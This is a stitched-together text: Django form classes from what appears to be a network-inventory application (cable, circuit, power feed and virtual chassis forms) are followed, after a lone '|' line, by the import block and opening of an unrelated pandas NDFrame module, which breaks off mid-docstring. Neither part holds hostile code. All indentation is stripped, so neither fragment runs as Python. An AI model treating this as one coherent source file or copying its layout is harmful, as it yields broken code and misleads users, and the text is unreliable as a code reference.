class ConnectCableToCircuitTerminationForm(BootstrapMixin, CustomFieldModelForm):
termination_b_provider = DynamicModelChoiceField(
queryset=Provider.objects.all(),
label='Provider',
required=False
)
termination_b_region = DynamicModelChoiceField(
queryset=Region.objects.all(),
label='Region',
required=False
)
termination_b_site = DynamicModelChoiceField(
queryset=Site.objects.all(),
label='Site',
required=False,
query_params={
'region_id': '$termination_b_region'
}
)
termination_b_circuit = DynamicModelChoiceField(
queryset=Circuit.objects.all(),
label='Circuit',
display_field='cid',
query_params={
'provider_id': '$termination_b_provider',
'site_id': '$termination_b_site',
}
)
termination_b_id = DynamicModelChoiceField(
queryset=CircuitTermination.objects.all(),
label='Side',
display_field='term_side',
disabled_indicator='cable',
query_params={
'circuit_id': '$termination_b_circuit'
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Cable
fields = [
'termination_b_provider', 'termination_b_region', 'termination_b_site', 'termination_b_circuit',
'termination_b_id', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
]
def clean_termination_b_id(self):
# Return the PK rather than the object
return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class ConnectCableToPowerFeedForm(BootstrapMixin, CustomFieldModelForm):
termination_b_region = DynamicModelChoiceField(
queryset=Region.objects.all(),
label='Region',
required=False
)
termination_b_site = DynamicModelChoiceField(
queryset=Site.objects.all(),
label='Site',
required=False,
query_params={
'region_id': '$termination_b_region'
}
)
termination_b_rackgroup = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
label='Rack Group',
required=False,
display_field='cid',
query_params={
'site_id': '$termination_b_site'
}
)
termination_b_powerpanel = DynamicModelChoiceField(
queryset=PowerPanel.objects.all(),
label='Power Panel',
required=False,
query_params={
'site_id': '$termination_b_site',
'rack_group_id': '$termination_b_rackgroup',
}
)
termination_b_id = DynamicModelChoiceField(
queryset=PowerFeed.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'power_panel_id': '$termination_b_powerpanel'
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Cable
fields = [
'termination_b_rackgroup', 'termination_b_powerpanel', 'termination_b_id', 'type', 'status', 'label',
'color', 'length', 'length_unit', 'tags',
]
def clean_termination_b_id(self):
# Return the PK rather than the object
return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class CableForm(BootstrapMixin, CustomFieldModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Cable
fields = [
'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
]
widgets = {
'status': StaticSelect2,
'type': StaticSelect2,
'length_unit': StaticSelect2,
}
error_messages = {
'length': {
'max_value': 'Maximum length is 32767 (any unit)'
}
}
class CableCSVForm(CustomFieldModelCSVForm):
# Termination A
side_a_device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
help_text='Side A device'
)
side_a_type = CSVContentTypeField(
queryset=ContentType.objects.all(),
limit_choices_to=CABLE_TERMINATION_MODELS,
help_text='Side A type'
)
side_a_name = forms.CharField(
help_text='Side A component name'
)
# Termination B
side_b_device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
help_text='Side B device'
)
side_b_type = CSVContentTypeField(
queryset=ContentType.objects.all(),
limit_choices_to=CABLE_TERMINATION_MODELS,
help_text='Side B type'
)
side_b_name = forms.CharField(
help_text='Side B component name'
)
# Cable attributes
status = CSVChoiceField(
choices=CableStatusChoices,
required=False,
help_text='Connection status'
)
type = CSVChoiceField(
choices=CableTypeChoices,
required=False,
help_text='Physical medium classification'
)
length_unit = CSVChoiceField(
choices=CableLengthUnitChoices,
required=False,
help_text='Length unit'
)
class Meta:
model = Cable
fields = [
'side_a_device', 'side_a_type', 'side_a_name', 'side_b_device', 'side_b_type', 'side_b_name', 'type',
'status', 'label', 'color', 'length', 'length_unit',
]
help_texts = {
'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
}
def _clean_side(self, side):
"""
Derive a Cable's A/B termination objects.
:param side: 'a' or 'b'
"""
assert side in 'ab', f"Invalid side designation: {side}"
device = self.cleaned_data.get(f'side_{side}_device')
content_type = self.cleaned_data.get(f'side_{side}_type')
name = self.cleaned_data.get(f'side_{side}_name')
if not device or not content_type or not name:
return None
model = content_type.model_class()
try:
termination_object = model.objects.get(device=device, name=name)
if termination_object.cable is not None:
raise forms.ValidationError(f"Side {side.upper()}: {device} {termination_object} is already connected")
except ObjectDoesNotExist:
raise forms.ValidationError(f"{side.upper()} side termination not found: {device} {name}")
setattr(self.instance, f'termination_{side}', termination_object)
return termination_object
def clean_side_a_name(self):
return self._clean_side('a')
def clean_side_b_name(self):
return self._clean_side('b')
def clean_length_unit(self):
# Avoid trying to save as NULL
length_unit = self.cleaned_data.get('length_unit', None)
return length_unit if length_unit is not None else ''
class CableBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Cable.objects.all(),
widget=forms.MultipleHiddenInput
)
type = forms.ChoiceField(
choices=add_blank_choice(CableTypeChoices),
required=False,
initial='',
widget=StaticSelect2()
)
status = forms.ChoiceField(
choices=add_blank_choice(CableStatusChoices),
required=False,
widget=StaticSelect2(),
initial=''
)
label = forms.CharField(
max_length=100,
required=False
)
color = forms.CharField(
max_length=6, # RGB color code
required=False,
widget=ColorSelect()
)
length = forms.IntegerField(
min_value=1,
required=False
)
length_unit = forms.ChoiceField(
choices=add_blank_choice(CableLengthUnitChoices),
required=False,
initial='',
widget=StaticSelect2()
)
class Meta:
nullable_fields = [
'type', 'status', 'label', 'color', 'length',
]
def clean(self):
super().clean()
# Validate length/unit
length = self.cleaned_data.get('length')
length_unit = self.cleaned_data.get('length_unit')
if length and not length_unit:
raise forms.ValidationError({
'length_unit': "Must specify a unit when setting length"
})
class CableFilterForm(BootstrapMixin, forms.Form):
model = Cable
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
tenant = DynamicModelMultipleChoiceField(
queryset=Tenant.objects.all(),
to_field_name='slug',
required=False
)
rack_id = DynamicModelMultipleChoiceField(
queryset=Rack.objects.all(),
required=False,
label='Rack',
null_option='None',
query_params={
'site': '$site'
}
)
type = forms.MultipleChoiceField(
choices=add_blank_choice(CableTypeChoices),
required=False,
widget=StaticSelect2()
)
status = forms.ChoiceField(
required=False,
choices=add_blank_choice(CableStatusChoices),
widget=StaticSelect2()
)
color = forms.CharField(
max_length=6, # RGB color code
required=False,
widget=ColorSelect()
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site',
'tenant': '$tenant',
'rack_id': '$rack_id',
}
)
tag = TagFilterField(model)
#
# Connections
#
class ConsoleConnectionFilterForm(BootstrapMixin, forms.Form):
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site'
}
)
class PowerConnectionFilterForm(BootstrapMixin, forms.Form):
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site'
}
)
class InterfaceConnectionFilterForm(BootstrapMixin, forms.Form):
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site'
}
)
#
# Virtual chassis
#
class DeviceSelectionForm(forms.Form):
pk = forms.ModelMultipleChoiceField(
queryset=Device.objects.all(),
widget=forms.MultipleHiddenInput()
)
class VirtualChassisCreateForm(BootstrapMixin, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
null_option='None',
display_field='display_name',
query_params={
'site_id': '$site'
}
)
members = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
display_field='display_name',
query_params={
'site_id': '$site',
'rack_id': '$rack',
}
)
initial_position = forms.IntegerField(
initial=1,
required=False,
help_text='Position of the first member device. Increases by one for each additional member.'
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = VirtualChassis
fields = [
'name', 'domain', 'region', 'site', 'rack', 'members', 'initial_position', 'tags',
]
def save(self, *args, **kwargs):
instance = super().save(*args, **kwargs)
# Assign VC members
if instance.pk:
initial_position = self.cleaned_data.get('initial_position') or 1
for i, member in enumerate(self.cleaned_data['members'], start=initial_position):
member.virtual_chassis = instance
member.vc_position = i
member.save()
return instance
class VirtualChassisForm(BootstrapMixin, CustomFieldModelForm):
master = forms.ModelChoiceField(
queryset=Device.objects.all(),
required=False,
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = VirtualChassis
fields = [
'name', 'domain', 'master', 'tags',
]
widgets = {
'master': SelectWithPK(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['master'].queryset = Device.objects.filter(virtual_chassis=self.instance)
class BaseVCMemberFormSet(forms.BaseModelFormSet):
def clean(self):
super().clean()
# Check for duplicate VC position values
vc_position_list = []
for form in self.forms:
vc_position = form.cleaned_data.get('vc_position')
if vc_position:
if vc_position in vc_position_list:
error_msg = 'A virtual chassis member already exists in position {}.'.format(vc_position)
form.add_error('vc_position', error_msg)
vc_position_list.append(vc_position)
class DeviceVCMembershipForm(forms.ModelForm):
class Meta:
model = Device
fields = [
'vc_position', 'vc_priority',
]
labels = {
'vc_position': 'Position',
'vc_priority': 'Priority',
}
def __init__(self, validate_vc_position=False, *args, **kwargs):
super().__init__(*args, **kwargs)
# Require VC position (only required when the Device is a VirtualChassis member)
self.fields['vc_position'].required = True
# Validation of vc_position is optional. This is only required when adding a new member to an existing
# VirtualChassis. Otherwise, vc_position validation is handled by BaseVCMemberFormSet.
self.validate_vc_position = validate_vc_position
def clean_vc_position(self):
vc_position = self.cleaned_data['vc_position']
if self.validate_vc_position:
conflicting_members = Device.objects.filter(
virtual_chassis=self.instance.virtual_chassis,
vc_position=vc_position
)
if conflicting_members.exists():
raise forms.ValidationError(
'A virtual chassis member already exists in position {}.'.format(vc_position)
)
return vc_position
class VCMemberSelectForm(BootstrapMixin, forms.Form):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
null_option='None',
display_field='display_name',
query_params={
'site_id': '$site'
}
)
device = DynamicModelChoiceField(
queryset=Device.objects.all(),
display_field='display_name',
query_params={
'site_id': '$site',
'rack_id': '$rack',
'virtual_chassis_id': 'null',
}
)
def clean_device(self):
device = self.cleaned_data['device']
if device.virtual_chassis is not None:
raise forms.ValidationError(
f"Device {device} is already assigned to a virtual chassis."
)
return device
class VirtualChassisBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=VirtualChassis.objects.all(),
widget=forms.MultipleHiddenInput()
)
domain = forms.CharField(
max_length=30,
required=False
)
class Meta:
nullable_fields = ['domain']
class VirtualChassisCSVForm(CustomFieldModelCSVForm):
master = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
required=False,
help_text='Master device'
)
class Meta:
model = VirtualChassis
fields = VirtualChassis.csv_headers
class VirtualChassisFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = VirtualChassis
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
tenant_group = DynamicModelMultipleChoiceField(
queryset=TenantGroup.objects.all(),
to_field_name='slug',
required=False,
null_option='None'
)
tenant = DynamicModelMultipleChoiceField(
queryset=Tenant.objects.all(),
to_field_name='slug',
required=False,
null_option='None',
query_params={
'group': '$tenant_group'
}
)
tag = TagFilterField(model)
#
# Power panels
#
class PowerPanelForm(BootstrapMixin, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
query_params={
'region_id': '$region'
}
)
rack_group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = PowerPanel
fields = [
'region', 'site', 'rack_group', 'name', 'tags',
]
class PowerPanelCSVForm(CustomFieldModelCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Name of parent site'
)
rack_group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
to_field_name='name'
)
class Meta:
model = PowerPanel
fields = PowerPanel.csv_headers
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit group queryset by assigned site
params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
class PowerPanelBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=PowerPanel.objects.all(),
widget=forms.MultipleHiddenInput
)
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
rack_group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
class Meta:
nullable_fields = ['rack_group']
class PowerPanelFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = PowerPanel
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
rack_group_id = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.all(),
required=False,
label='Rack group (ID)',
null_option='None',
query_params={
'site': '$site'
}
)
tag = TagFilterField(model)
#
# Power feeds
#
class PowerFeedForm(BootstrapMixin, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites__powerpanel': '$power_panel'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
initial_params={
'powerpanel': '$power_panel'
},
query_params={
'region_id': '$region'
}
)
power_panel = DynamicModelChoiceField(
queryset=PowerPanel.objects.all(),
query_params={
'site_id': '$site'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
display_field='display_name',
query_params={
'site_id': '$site'
}
)
comments = CommentField()
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = PowerFeed
fields = [
'region', 'site', 'power_panel', 'rack', 'name', 'status', 'type', 'supply', 'phase', 'voltage', 'amperage',
'max_utilization', 'comments', 'tags',
]
widgets = {
'status': StaticSelect2(),
'type': StaticSelect2(),
'supply': StaticSelect2(),
'phase': StaticSelect2(),
}
class PowerFeedCSVForm(CustomFieldModelCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Assigned site'
)
power_panel = CSVModelChoiceField(
queryset=PowerPanel.objects.all(),
to_field_name='name',
help_text='Upstream power panel'
)
rack_group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
to_field_name='name',
required=False,
help_text="Rack's group (if any)"
)
rack = CSVModelChoiceField(
queryset=Rack.objects.all(),
to_field_name='name',
required=False,
help_text='Rack'
)
status = CSVChoiceField(
choices=PowerFeedStatusChoices,
required=False,
help_text='Operational status'
)
type = CSVChoiceField(
choices=PowerFeedTypeChoices,
required=False,
help_text='Primary or redundant'
)
supply = CSVChoiceField(
choices=PowerFeedSupplyChoices,
required=False,
help_text='Supply type (AC/DC)'
)
phase = CSVChoiceField(
choices=PowerFeedPhaseChoices,
required=False,
help_text='Single or three-phase'
)
class Meta:
model = PowerFeed
fields = PowerFeed.csv_headers
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit power_panel queryset by site
params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
self.fields['power_panel'].queryset = self.fields['power_panel'].queryset.filter(**params)
# Limit rack_group queryset by site
params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
# Limit rack queryset by site and group
params = {
f"site__{self.fields['site'].to_field_name}": data.get('site'),
f"group__{self.fields['rack_group'].to_field_name}": data.get('rack_group'),
}
self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class PowerFeedBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=PowerFeed.objects.all(),
widget=forms.MultipleHiddenInput
)
power_panel = DynamicModelChoiceField(
queryset=PowerPanel.objects.all(),
required=False
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
display_field='display_name'
)
status = forms.ChoiceField(
choices=add_blank_choice(PowerFeedStatusChoices),
required=False,
initial='',
widget=StaticSelect2()
)
type = forms.ChoiceField(
choices=add_blank_choice(PowerFeedTypeChoices),
required=False,
initial='',
widget=StaticSelect2()
)
supply = forms.ChoiceField(
choices=add_blank_choice(PowerFeedSupplyChoices),
required=False,
initial='',
widget=StaticSelect2()
)
phase = forms.ChoiceField(
choices=add_blank_choice(PowerFeedPhaseChoices),
required=False,
initial='',
widget=StaticSelect2()
)
voltage = forms.IntegerField(
required=False
)
amperage = forms.IntegerField(
required=False
)
max_utilization = forms.IntegerField(
required=False
)
comments = CommentField(
widget=SmallTextarea,
label='Comments'
)
class Meta:
nullable_fields = [
'rackgroup', 'comments',
]
class PowerFeedFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = PowerFeed
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
power_panel_id = DynamicModelMultipleChoiceField(
queryset=PowerPanel.objects.all(),
required=False,
label='Power panel',
null_option='None',
query_params={
'site': '$site'
}
)
rack_id = DynamicModelMultipleChoiceField(
queryset=Rack.objects.all(),
required=False,
label='Rack',
null_option='None',
query_params={
'site': '$site'
}
)
status = forms.MultipleChoiceField(
choices=PowerFeedStatusChoices,
required=False,
widget=StaticSelect2Multiple()
)
type = forms.ChoiceField(
choices=add_blank_choice(PowerFeedTypeChoices),
required=False,
widget=StaticSelect2()
)
supply = forms.ChoiceField(
choices=add_blank_choice(PowerFeedSupplyChoices),
required=False,
widget=StaticSelect2()
)
phase = forms.ChoiceField(
choices=add_blank_choice(PowerFeedPhaseChoices),
required=False,
widget=StaticSelect2()
)
voltage = forms.IntegerField(
required=False
)
amperage = forms.IntegerField(
required=False
)
max_utilization = forms.IntegerField(
required=False
)
tag = TagFilterField(model)
|
import collections
from datetime import timedelta
import functools
import gc
import json
import operator
import pickle
import re
from textwrap import dedent
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
FrozenSet,
Hashable,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Type,
Union,
)
import warnings
import weakref
import numpy as np
from pandas._config import config
from pandas._libs import Timestamp, iNaT, lib
from pandas._typing import (
Axis,
FilePathOrBuffer,
FrameOrSeries,
JSONSerializable,
Label,
Level,
Renamer,
)
from pandas.compat import set_function_name
from pandas.compat._optional import import_optional_dependency
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
Appender,
Substitution,
doc,
rewrite_axis_style_signature,
)
from pandas.util._validators import (
validate_bool_kwarg,
validate_fillna_kwargs,
validate_percentile,
)
from pandas.core.dtypes.common import (
ensure_int64,
ensure_object,
ensure_str,
is_bool,
is_bool_dtype,
is_datetime64_any_dtype,
is_datetime64tz_dtype,
is_dict_like,
is_extension_array_dtype,
is_float,
is_integer,
is_list_like,
is_number,
is_numeric_dtype,
is_object_dtype,
is_period_arraylike,
is_re_compilable,
is_scalar,
is_timedelta64_dtype,
pandas_dtype,
)
from pandas.core.dtypes.generic import ABCDataFrame, ABCSeries
from pandas.core.dtypes.inference import is_hashable
from pandas.core.dtypes.missing import isna, notna
import pandas as pd
from pandas.core import missing, nanops
import pandas.core.algorithms as algos
from pandas.core.base import PandasObject, SelectionMixin
import pandas.core.common as com
from pandas.core.construction import create_series_with_explicit_dtype
from pandas.core.indexes.api import (
Index,
InvalidIndexError,
MultiIndex,
RangeIndex,
ensure_index,
)
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.period import Period, PeriodIndex
import pandas.core.indexing as indexing
from pandas.core.internals import BlockManager
from pandas.core.missing import find_valid_index
from pandas.core.ops import _align_method_FRAME
from pandas.io.formats import format as fmt
from pandas.io.formats.format import DataFrameFormatter, format_percentiles
from pandas.io.formats.printing import pprint_thing
from pandas.tseries.frequencies import to_offset
if TYPE_CHECKING:
from pandas.core.resample import Resampler
# goal is to be able to define the docs close to function, while still being
# able to share
_shared_docs: Dict[str, str] = dict()
_shared_doc_kwargs = dict(
axes="keywords for axes",
klass="Series/DataFrame",
axes_single_arg="int or labels for object",
args_transpose="axes to permute (int or label for object)",
optional_by="""
by : str or list of str
Name or list of names to sort by""",
)
def _single_replace(self, to_replace, method, inplace, limit):
"""
Replaces values in a Series using the fill method specified when no
replacement value is given in the replace method
"""
if self.ndim != 1:
raise TypeError(
f"cannot replace {to_replace} with method {method} on a "
f"{type(self).__name__}"
)
orig_dtype = self.dtype
result = self if inplace else self.copy()
fill_f = missing.get_fill_func(method)
mask = missing.mask_missing(result.values, to_replace)
values = fill_f(result.values, limit=limit, mask=mask)
if values.dtype == orig_dtype and inplace:
return
result = pd.Series(values, index=self.index, dtype=self.dtype).__finalize__(self)
if inplace:
self._update_inplace(result._data)
return
return result
bool_t = bool # Need alias because NDFrame has def bool:
class NDFrame(PandasObject, SelectionMixin, indexing.IndexingMixin):
"""
N-dimensional analogue of DataFrame. Store multi-dimensional in a
size-mutable, labeled data structure
Parameters
----------
data : BlockManager
axes : list
copy : bool, default False
"""
_internal_names: List[str] = [
"_data",
"_cacher",
"_item_cache",
"_cache",
"_is_copy",
"_subtyp",
"_name",
"_index",
"_default_kind",
"_default_fill_value",
"_metadata",
"__array_struct__",
"__array_interface__",
]
_internal_names_set: Set[str] = set(_internal_names)
_accessors: Set[str] = set()
_deprecations: FrozenSet[str] = frozenset(["get_values"])
_metadata: List[str] = []
_is_copy = None
_data: BlockManager
_attrs: Dict[Optional[Hashable], Any]
_typ: str
# ----------------------------------------------------------------------
# Constructors
def __init__(
self,
data: BlockManager,
copy: bool = False,
attrs: Optional[Mapping[Optional[Hashable], Any]] = None,
):
# copy kwarg is retained for mypy compat, is not used
object.__setattr__(self, "_is_copy", None)
object.__setattr__(self, "_data", data)
object.__setattr__(self, "_item_cache", {})
if attrs is None:
attrs = {}
else:
attrs = dict(attrs)
object.__setattr__(self, "_attrs", attrs)
@classmethod
def _init_mgr(cls, mgr, axes=None, dtype=None, copy=False):
""" passed a manager and a axes dict """
for a, axe in axes.items():
if axe is not None:
mgr = mgr.reindex_axis(
axe, axis=cls._get_block_manager_axis(a), copy=False
)
# make a copy if explicitly requested
if copy:
mgr = mgr.copy()
if dtype is not None:
# avoid further copies if we can
if len(mgr.blocks) > 1 or mgr.blocks[0].values.dtype != dtype:
mgr = mgr.astype(dtype=dtype)
return mgr
# ----------------------------------------------------------------------
@property
def attrs(self) -> Dict[Optional[Hashable], Any]:
"""
Dictionary of global attributes on this object.
.. warning::
attrs is experimental and may change without warning.
"""
if self._attrs is None:
self._attrs = {}
return self._attrs
@attrs.setter
def attrs(self, value: Mapping[Optional[Hashable], Any]) -> None:
self._attrs = dict(value)
@classmethod
def _validate_dtype(cls, dtype):
""" validate the passed dtype """
if dtype is not None:
dtype = pandas_dtype(dtype)
# a compound dtype
if dtype.kind == "V":
raise NotImplementedError(
"compound dtypes are not implemented "
f"in the {cls.__name__} constructor"
)
return dtype
# ----------------------------------------------------------------------
# Construction
@property
def _constructor(self: FrameOrSeries) -> Type[FrameOrSeries]:
"""
Used when a manipulation result has the same dimensions as the
original.
"""
raise AbstractMethodError(self)
@property
def _constructor_sliced(self):
"""
Used when a manipulation result has one lower dimension(s) as the
original, such as DataFrame single columns slicing.
"""
raise AbstractMethodError(self)
@property
def _constructor_expanddim(self):
"""
Used when a manipulation result has one higher dimension as the
original, such as Series.to_frame()
"""
raise NotImplementedError
# ----------------------------------------------------------------------
# Axis
_AXIS_ALIASES = {"rows": 0}
_AXIS_IALIASES = {0: "rows"}
_stat_axis_number = 0
_stat_axis_name = "index"
_ix = None
_AXIS_ORDERS: List[str]
_AXIS_NUMBERS: Dict[str, int]
_AXIS_NAMES: Dict[int, str]
_AXIS_REVERSED: bool
_info_axis_number: int
_info_axis_name: str
_AXIS_LEN: int
def _construct_axes_dict(self, axes=None, **kwargs):
"""Return an axes dictionary for myself."""
d = {a: self._get_axis(a) for a in (axes or self._AXIS_ORDERS)}
d.update(kwargs)
return d
@classmethod
def _construct_axes_from_arguments(
cls, args, kwargs, require_all: bool = False, sentinel=None
):
"""
Construct and returns axes if supplied in args/kwargs.
If require_all, raise if all axis arguments are not supplied
return a tuple of (axes, kwargs).
sentinel specifies the default parameter when an axis is not
supplied; useful to distinguish when a user explicitly passes None
in scenarios where None has special meaning.
"""
# construct the args
args = list(args)
for a in cls._AXIS_ORDERS:
# look for a argument by position
if a not in kwargs:
try:
kwargs[a] = args.pop(0)
except IndexError as err:
if require_all:
raise TypeError(
"not enough/duplicate arguments specified!"
) from err
axes = {a: kwargs.pop(a, sentinel) for a in cls._AXIS_ORDERS}
return axes, kwargs
@classmethod
def _get_axis_number(cls, axis):
axis = cls._AXIS_ALIASES.get(axis, axis)
if is_integer(axis):
if axis in cls._AXIS_NAMES:
return axis
else:
try:
return cls._AXIS_NUMBERS[axis]
except KeyError:
pass
raise ValueError(f"No axis named {axis} for object type {cls}")
@classmethod
def _get_axis_name(cls, axis):
axis = cls._AXIS_ALIASES.get(axis, axis)
if isinstance(axis, str):
if axis in cls._AXIS_NUMBERS:
return axis
else:
try:
return cls._AXIS_NAMES[axis]
except KeyError:
pass
raise ValueError(f"No axis named {axis} for object type {cls}")
def _get_axis(self, axis):
name = self._get_axis_name(axis)
return getattr(self, name)
@classmethod
def _get_block_manager_axis(cls, axis):
"""Map the axis to the block_manager axis."""
axis = cls._get_axis_number(axis)
if cls._AXIS_REVERSED:
m = cls._AXIS_LEN - 1
return m - axis
return axis
def _get_axis_resolvers(self, axis: str) -> Dict[str, ABCSeries]:
# index or columns
axis_index = getattr(self, axis)
d = dict()
prefix = axis[0]
for i, name in enumerate(axis_index.names):
if name is not None:
key = level = name
else:
# prefix with 'i' or 'c' depending on the input axis
# e.g., you must do ilevel_0 for the 0th level of an unnamed
# multiiindex
key = f"{prefix}level_{i}"
level = i
level_values = axis_index.get_level_values(level)
s = level_values.to_series()
s.index = axis_index
d[key] = s
# put the index/columns itself in the dict
if isinstance(axis_index, MultiIndex):
dindex = axis_index
else:
dindex = axis_index.to_series()
d[axis] = dindex
return d
def _get_index_resolvers(self) -> Dict[str, ABCSeries]:
from pandas.core.computation.parsing import clean_column_name
d: Dict[str, ABCSeries] = {}
for axis_name in self._AXIS_ORDERS:
d.update(self._get_axis_resolvers(axis_name))
return {clean_column_name(k): v for k, v in d.items() if not isinstance(k, int)}
def _get_cleaned_column_resolvers(self) -> Dict[str, ABCSeries]:
"""
Return the special character free column resolvers of a dataframe.
Column names with special characters are 'cleaned up' so that they can
be referred to by backtick quoting.
Used in :meth:`DataFrame.eval`.
"""
from pandas.core.computation.parsing import clean_column_name
if isinstance(self, ABCSeries):
return {clean_column_name(self.name): self}
return {
clean_column_name(k): v for k, v in self.items() if not isinstance(k, int)
}
@property
def _info_axis(self):
return getattr(self, self._info_axis_name)
@property
def _stat_axis(self):
return getattr(self, self._stat_axis_name)
@property
def shape(self) -> Tuple[int, ...]:
"""
Return a tuple of axis dimensions
"""
return tuple(len(self._get_axis(a)) for a in self._AXIS_ORDERS)
@property
def axes(self) -> List[Index]:
"""
